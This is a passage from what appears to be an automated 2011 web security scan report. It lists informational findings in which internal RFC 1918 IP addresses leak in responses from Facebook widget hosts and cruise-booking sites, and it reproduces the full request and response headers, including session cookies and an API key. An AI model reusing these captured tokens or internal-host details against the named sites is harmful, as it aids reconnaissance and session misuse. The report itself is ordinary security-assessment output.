Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: image/gif
X-FB-Server: 10.27.175.119
X-Cnection: close
Content-Length: 1894
Cache-Control: max-age=17250
Expires: Mon, 03 Oct 2011 17:28:18 GMT
Date: Mon, 03 Oct 2011 12:40:48 GMT
Connection: close

GIF89a . ....................................................................................................!..NETSCAPE2.0.....!.......,.... . .....%.di.h..l..p,..ATxE....../.#X.H...<*G...y..*T.u....
...[SNIP]...
21.2. http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.connect.facebook.com
Path:   /js/api_lib/v0.4/FeatureLoader.js.php/en_US

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /js/api_lib/v0.4/FeatureLoader.js.php/en_US HTTP/1.1
Host: static.ak.connect.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.cruisesonly.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS
If-None-Match: "99efa0dca8dd332f11f8176ad4e2ad6c"

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
ETag: "e11cb49521860bcd18b4faec349d6327"
X-FB-Server: 10.32.168.128
X-Cnection: close
Content-Length: 18454
Vary: Accept-Encoding
Cache-Control: public, max-age=865
Expires: Mon, 03 Oct 2011 12:55:06 GMT
Date: Mon, 03 Oct 2011 12:40:41 GMT
Connection: close

/*1317446652,169912448,JIT Construction: v451912,en_US*/

if (!window.FB) {FB = {};} if(!FB.dynData) { FB.dynData = {"site_vars":{"canvas_client_compute_content_size_method":1,"use_postMessage":0,"use
...[SNIP]...
21.3. http://static.ak.facebook.com/connect.php/en_US/css/bookmark-button-css/connect-button-css/share-button-css/FB.Connect-css/connect-css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.facebook.com
Path:   /connect.php/en_US/css/bookmark-button-css/connect-button-css/share-button-css/FB.Connect-css/connect-css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /connect.php/en_US/css/bookmark-button-css/connect-button-css/share-button-css/FB.Connect-css/connect-css HTTP/1.1
Host: static.ak.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.cruisesonly.com/promotion/bermuda-cruises.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
ETag: "8ce952d2c65a22739ac5aff98a6707a7"
Vary: Accept-Encoding
X-FB-Server: 10.54.206.54
X-Cnection: close
Content-Type: text/css; charset=utf-8
Content-Length: 14288
Cache-Control: public, max-age=406
Expires: Mon, 03 Oct 2011 12:52:13 GMT
Date: Mon, 03 Oct 2011 12:45:27 GMT
Connection: close

/*1311721467,171373349,JIT Construction: v411252,en_US*/

.FB_UIButton{background-image:url(/images/ui/UIActionButton_ltr.png);border-style:solid;border-width:1px;display:-moz-inline-box;display:inlin
...[SNIP]...
21.4. http://static.ak.facebook.com/connect.php/en_US/js/Api/CanvasUtil/Connect/XFBML  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.facebook.com
Path:   /connect.php/en_US/js/Api/CanvasUtil/Connect/XFBML

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /connect.php/en_US/js/Api/CanvasUtil/Connect/XFBML HTTP/1.1
Host: static.ak.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.cruisesonly.com/promotion/bermuda-cruises.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
ETag: "4b23397b9c7d6a37ddaea942f3668e80"
Vary: Accept-Encoding
Content-Type: application/x-javascript; charset=utf-8
X-FB-Server: 10.62.251.52
X-Cnection: close
Content-Length: 211330
Cache-Control: public, max-age=894
Expires: Mon, 03 Oct 2011 13:00:20 GMT
Date: Mon, 03 Oct 2011 12:45:26 GMT
Connection: close

/*1317445576,171899700,JIT Construction: v451912,en_US*/

if (!window.FB) {FB = {};} if(!FB.dynData) { FB.dynData = {"site_vars":{"canvas_client_compute_content_size_method":1,"use_postMessage":0,"use
...[SNIP]...
21.5. http://static.ak.facebook.com/images/loaders/indicator_white_large.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.facebook.com
Path:   /images/loaders/indicator_white_large.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /images/loaders/indicator_white_large.gif HTTP/1.1
Host: static.ak.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.cruisesonly.com/promotion/bermuda-cruises.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: image/gif
X-FB-Server: 10.138.17.186
Content-Length: 1894
Cache-Control: max-age=2204271
Expires: Sat, 29 Oct 2011 01:03:18 GMT
Date: Mon, 03 Oct 2011 12:45:27 GMT
Connection: close

GIF89a . ....................................................................................................!..NETSCAPE2.0.....!.......,.... . .....%.di.h..l..p,..ATxE....../.#X.H...<*G...y..*T.u....
...[SNIP]...
21.6. http://static.ak.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.facebook.com
Path:   /js/api_lib/v0.4/FeatureLoader.js.php/en_US

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /js/api_lib/v0.4/FeatureLoader.js.php/en_US HTTP/1.1
Host: static.ak.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.cruisesonly.com/promotion/bermuda-cruises.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
ETag: "fa2cbcd06c060be78120c536e67e4e97"
Vary: Accept-Encoding
Content-Type: application/x-javascript; charset=utf-8
X-FB-Server: 10.63.12.40
X-Cnection: close
Content-Length: 18446
Cache-Control: public, max-age=745
Expires: Mon, 03 Oct 2011 12:57:48 GMT
Date: Mon, 03 Oct 2011 12:45:23 GMT
Connection: close

/*1317446163,171904040,JIT Construction: v451912,en_US*/

if (!window.FB) {FB = {};} if(!FB.dynData) { FB.dynData = {"site_vars":{"canvas_client_compute_content_size_method":1,"use_postMessage":0,"use
...[SNIP]...
21.7. http://www.connect.facebook.com/widgets/fan.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.connect.facebook.com
Path:   /widgets/fan.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /widgets/fan.php?api_key=09addd37a06e06e413d53e5411603783&channel_url=http%3A%2F%2Fwww.cruisesonly.com%2F%3Ffbc_channel%3D1&id=50243286972&name=&width=280&connections=0&stream=&logobar=&css= HTTP/1.1
Host: www.connect.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.cruisesonly.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.6.125
X-Cnection: close
Date: Mon, 03 Oct 2011 12:40:49 GMT
Content-Length: 8515

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Fan</title>
<link type="text/css" rel="stylesheet" href="http:
...[SNIP]...
21.8. http://www.connect.facebook.com/widgets/fan.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.connect.facebook.com
Path:   /widgets/fan.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /widgets/fan.php HTTP/1.1
Host: www.connect.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-UA-Compatible: IE=edge
X-XSS-Protection: 0
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.140.118
Connection: close
Date: Mon, 03 Oct 2011 13:02:59 GMT
Content-Length: 4517

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Fan</title>
<link type="text/css" rel="stylesheet" href="http:
...[SNIP]...
21.9. http://www.connect.facebook.com/widgets/fan.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.connect.facebook.com
Path:   /widgets/fan.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /widgets/fan.php?api_key=09addd37a06e06e413d53e5411603783&channel_url=http%3A%2F%2Fwww.cruisesonly.com%2F%3Ffbc_channel%3D1&id=50243286972&name=&width=280&connections=0&stream=&logobar=&css= HTTP/1.1
Host: www.connect.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.cruisesonly.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.42.127
X-Cnection: close
Date: Mon, 03 Oct 2011 12:40:49 GMT
Content-Length: 8515

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Fan</title>
<link type="text/css" rel="stylesheet" href="http:
...[SNIP]...
21.10. http://www.cruises.com/promotion/balcony-suite-cruises.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cruises.com
Path:   /promotion/balcony-suite-cruises.do

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /promotion/balcony-suite-cruises.do HTTP/1.1
Host: www.cruises.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.cruises.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WTHGeoLocation=CountryCode=US; WDVID=%7BFFB49BDE%2DB2EE%2D4D7A%2DB652%2DA6AA2F06AB63%7D; WDUID=%7BF6D9B130%2D78E7%2D4EA3%2D906E%2D3EB09D4F7BEE%7D; ASPSESSIONIDAQASDRCS=PFGAFPMACOENMMLEIOFADKLB; NSC_WJQ-DSVJTFT.DPN=ffffffff095b1c9c45525d5f4f58455e445a4a423662; _msuuid_7871bv11074=7200E557-607F-4F1A-82DB-75086671DFA2; NSC_WJQ-BQDI-DSVJTFT.DPN=ffffffff095b1d2c45525d5f4f58455e445a4a423660; __utmx=229343950.; __utmxx=229343950.; __utma=229343950.1971735135.1317645653.1317645653.1317645653.1; __utmb=229343950.6.9.1317645699652; __utmc=229343950; __utmz=229343950.1317645653.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=229343950.|1=SearchWidget=Dynamic=1

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:41:22 GMT
Server: Apache
Content-Length: 366262
Content-Type: text/html
Set-Cookie: NSC_WJQ-BQDI-DSVJTFT.DPN=ffffffff095b1d2c45525d5f4f58455e445a4a423660;expires=Mon, 03-Oct-2011 12:43:22 GMT;path=/


<script language='JavaScript' src='/lib/javascript/ajax/jquery/jquery-1.6.3.min.js'></script>
<script language="javascript" src="/Code/javascript/ajax/jquery/jquery.form.js" type="text/java
...[SNIP]...
<!--CMS servername and timestamp URL:http://mag.web.nlg1.com/magnoliaPublic/Creative/balcony-suite-cruises/housebrands/crudotcom , mag.web.nlg1.com, remote IP 10.83.0.1- Oct 3, 2011 8:28:42 AM-->
...[SNIP]...
21.11. http://www.cruises.com/promotion/weekend-cruises.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cruises.com
Path:   /promotion/weekend-cruises.do

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /promotion/weekend-cruises.do HTTP/1.1
Host: www.cruises.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.cruises.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WTHGeoLocation=CountryCode=US; WDVID=%7BFFB49BDE%2DB2EE%2D4D7A%2DB652%2DA6AA2F06AB63%7D; WDUID=%7BF6D9B130%2D78E7%2D4EA3%2D906E%2D3EB09D4F7BEE%7D; ASPSESSIONIDAQASDRCS=PFGAFPMACOENMMLEIOFADKLB; NSC_WJQ-DSVJTFT.DPN=ffffffff095b1c9c45525d5f4f58455e445a4a423662; _msuuid_7871bv11074=7200E557-607F-4F1A-82DB-75086671DFA2; __utmx=229343950.; __utmxx=229343950.; NSC_WJQ-BQDI-DSVJTFT.DPN=ffffffff095b1d2c45525d5f4f58455e445a4a423660; __utma=229343950.1971735135.1317645653.1317645653.1317645653.1; __utmb=229343950.8.9.1317645699652; __utmc=229343950; __utmz=229343950.1317645653.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=229343950.|1=SearchWidget=Dynamic=1

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:42:36 GMT
Server: Apache
Content-Length: 129897
Content-Type: text/html
Set-Cookie: NSC_WJQ-BQDI-DSVJTFT.DPN=ffffffff095b1d2c45525d5f4f58455e445a4a423660;expires=Mon, 03-Oct-2011 12:44:36 GMT;path=/


<script language='JavaScript' src='/lib/javascript/ajax/jquery/jquery-1.6.3.min.js'></script>
<script language="javascript" src="/Code/javascript/ajax/jquery/jquery.form.js" type="text/java
...[SNIP]...
<!--CMS servername and timestamp URL:http://mag.web.nlg1.com/magnoliaPublic/Creative/weekend-cruises/housebrands/crudotcom , mag.web.nlg1.com, remote IP 10.83.0.1- Oct 3, 2011 7:36:04 AM-->
...[SNIP]...
21.12. http://www.cruisesonly.com/promotion/bermuda-cruises.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cruisesonly.com
Path:   /promotion/bermuda-cruises.do

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /promotion/bermuda-cruises.do HTTP/1.1
Host: www.cruisesonly.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WDVID=%7BD8541B8C%2D79AE%2D4C96%2D9B36%2D0670FE94C35D%7D; ASPSESSIONIDSSCCSDSR=LNIDLMMAFLKGLMDCEIKIDAKI; NSC_WJQ-DSVJTFTPOMZ.DPN=ffffffff095b1c5645525d5f4f58455e445a4a423660; BrowserTest=ON; _msuuid_7879jl5289=63E87AE9-BEEA-49B1-9132-2AF4FA00DDDD; JSESSIONID=E5DDBE0407B36DF2815ADD375CCA88F0; __utma=204213570.186654333.1317645662.1317645662.1317645662.1; __utmb=204213570.5.9.1317645669909; __utmc=204213570; __utmz=204213570.1317645662.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WDUID=%7B59AC8C91%2D64B1%2D4406%2D827F%2DA32E25423DAC%7D1c8fe390ed9e4354eaa4e6f; IncludeAlumniRates=1c8fe3904be4744e95f12c08; AlumniCruiseId=false; shoppingZipCode="Zip Code"; sid=6386; partnerStamp=21960764; AFF%5FCID=6386

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:45:23 GMT
Server: Apache
Content-Length: 116327
Content-Type: text/html
Set-Cookie: NSC_WJQ-BQDI-DSVJTFTPOMZ.DPN=ffffffff095b1d3845525d5f4f58455e445a4a423660;expires=Mon, 03-Oct-2011 12:47:23 GMT;path=/


<script language='JavaScript' src='/lib/javascript/ajax/jquery/jquery-1.6.3.min.js'></script>
<script language="javascript" src="/Code/javascript/ajax/jquery/jquery.form.js" type="text/java
...[SNIP]...
<!--CMS servername and timestamp URL:http://mag.web.nlg1.com/magnoliaPublic/Creative/bermuda-cruises/housebrands/cruisesonly , mag.web.nlg1.com, remote IP 10.83.0.1- Oct 3, 2011 7:46:23 AM-->
...[SNIP]...
21.13. http://www.cruisesonly.com/sharedwidgets/Caribbean.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cruisesonly.com
Path:   /sharedwidgets/Caribbean.do

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /sharedwidgets/Caribbean.do?pageType=sharedwidgets HTTP/1.1
Host: www.cruisesonly.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html, */*; q=0.01
Referer: http://www.cruisesonly.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WDVID=%7BD8541B8C%2D79AE%2D4C96%2D9B36%2D0670FE94C35D%7D; WDUID=%7B59AC8C91%2D64B1%2D4406%2D827F%2DA32E25423DAC%7D; ASPSESSIONIDSSCCSDSR=LNIDLMMAFLKGLMDCEIKIDAKI; NSC_WJQ-DSVJTFTPOMZ.DPN=ffffffff095b1c5645525d5f4f58455e445a4a423660; __utma=204213570.186654333.1317645662.1317645662.1317645662.1; __utmb=204213570.1.10.1317645662; __utmc=204213570; __utmz=204213570.1317645662.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BrowserTest=ON

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:40:49 GMT
Server: Apache
Content-Length: 30270
Content-Type: text/html;charset=ISO-8859-1
Set-Cookie: NSC_WJQ-BQDI-DSVJTFTPOMZ.DPN=ffffffff095b1d2245525d5f4f58455e445a4a423660;expires=Mon, 03-Oct-2011 12:42:49 GMT;path=/


<script language="javascript" src="/Code/javascript/general/cookies.js"></script>
<script language="Javascript" src="/Code/javascript/JSPopup.js"></script>

       
<!--CMS servername and timestamp URL:http://mag.web.nlg1.com/magnoliaPublic/Creative/sharedwidgets/caribbean/housebrands/cruisesonly , mag.web.nlg1.com, remote IP 10.83.0.1- Oct 3, 2011 7:16:55 AM-->
...[SNIP]...
21.14. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=09addd37a06e06e413d53e5411603783&extern=0&channel=http%3A%2F%2Fwww.cruisesonly.com%2Fpromotion%2Fbermuda-cruises.do%3Ffbc_channel%3D1&locale=en_US&sdk=edgar HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.cruisesonly.com/promotion/bermuda-cruises.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.122.57
X-Cnection: close
Date: Mon, 03 Oct 2011 12:45:27 GMT
Content-Length: 58

Given URL is not allowed by the Application configuration.
21.15. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=09addd37a06e06e413d53e5411603783&extern=0&channel=http%3A%2F%2Fwww.cruisesonly.com%2F%3Ffbc_channel%3D1&locale=en_US&sdk=edgar HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.cruisesonly.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.140.33
X-Cnection: close
Date: Mon, 03 Oct 2011 12:40:49 GMT
Content-Length: 58

Given URL is not allowed by the Application configuration.
21.16. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2F%23%21%2Froyalcaribbean&send=false&layout=button_count&width=85&show_faces=false&action=like&colorscheme=light&font=arial&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.royalcaribbean.com/beforeyouboard/home.do?cS=NAVBAR
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.91.48
X-Cnection: close
Date: Mon, 03 Oct 2011 12:41:13 GMT
Content-Length: 23366

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
21.17. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2F%23%21%2Froyalcaribbean&send=false&layout=button_count&width=85&show_faces=false&action=like&colorscheme=light&font=arial&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.55.1.47
X-Cnection: close
Date: Mon, 03 Oct 2011 12:51:52 GMT
Content-Length: 23302

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
21.18. http://www.facebook.com/plugins/like.php  previous  next

Summary

